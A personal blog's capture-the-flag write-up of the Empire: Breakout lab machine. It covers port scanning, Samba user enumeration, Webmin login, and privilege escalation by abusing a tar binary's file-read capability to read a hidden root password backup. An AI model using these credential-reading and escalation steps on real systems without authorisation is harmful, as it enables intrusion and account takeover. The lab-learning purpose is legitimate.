I Suck At CTFs: Empire - Breakout

Written By Robert Cao

Well - I suck at CTFs. Maybe I just don’t have the CTF mindset, but here’s to trying to do a challenge a day until I start to like it or can them without a walkthrough =p

Start off with the typical NMAP scan

Received 80, 139, 445, 10000, and 20000

10000 and 20000 not shown

Go to the browser and head to IP:80

Hitting the web page with the Source Code and scrolling down we see this

Head to dcode.fr

You can use the CIPHERTEXT TO RECOGNIZE function

This shows a high confidence of the Brainfuck cipher

That gives us a password to use

We don’t have a username, remembering that we saw 139 and 445

Use enum4linux to enumerate samba for a username

We find the cyber user

So now we have a username and a password

Hit the IP:10000 in the web browser

Username and password doesn’t work there

Head to IP:20000

Username and password works there!

Going through the menu we see Command Shell and we can cat the user.txt

Searching msfconsole we find a lot of different exploits with webmin

Tried all of them and even with a username and password the exploits weren’t successful (I think?)

Back to the VM, using the Command Shell we find the tar binary

Using getcap we can find what capabilities the binary has

getcap is a Linux command used to check which capabilities are assigned to binaries. Capabilities allow a binary to perform specific privileged actions without needing full root privileges (unlike SUID).

🧭 Summary:

  • Command: getcap -r / 2>/dev/null

  • Purpose: Find binaries that may be used for privilege escalation without SUID

🔥 Interesting Capabilities for Privesc:

  • cap_dac_read_search

    • Read any file, bypassing file permissions

  • cap_net_raw

    • Send raw packetsping (usually harmless)

  • cap_setuid

    • Set UID to 0 (root)

  • cap_sys_admin

    • Do almost anything (like root) Dangerous if found

With the tar binary with those capabilities, CTF-ism says there’s gotta be a file that we need to read that we can’t read

find /var/ -name “.*” 2>/dev/null gives us a hidden .old_pass.bak

use the tar binary in the cyber directory to read the .bak file

./tar -cf - /var/backups/.old_pass.bak | tar -xf -

./tar -cf : this creates the “tarball”

- : this first argument position tells where to create the tarball, the hyphen just says to make output it STDOUT

/var/backups/.old_pass.bak : this is the file we want to read

| tar -xf - : this will take the output of the first tar and the -xf will extract it

It extracts it with the full path so the /var/backups/ directories are there

We can then cat the .bak file

Now we can use root and log into 10000

This is not shown, but we know the username is root because reading /etc/passwd, root is the only other login-able user

We can then get to Command Shell

With the shell as root we can then read the r00t.txt file

Robert Cao
Previous

I Suck at CTFs | Breakout Lupin One
Next

Report Template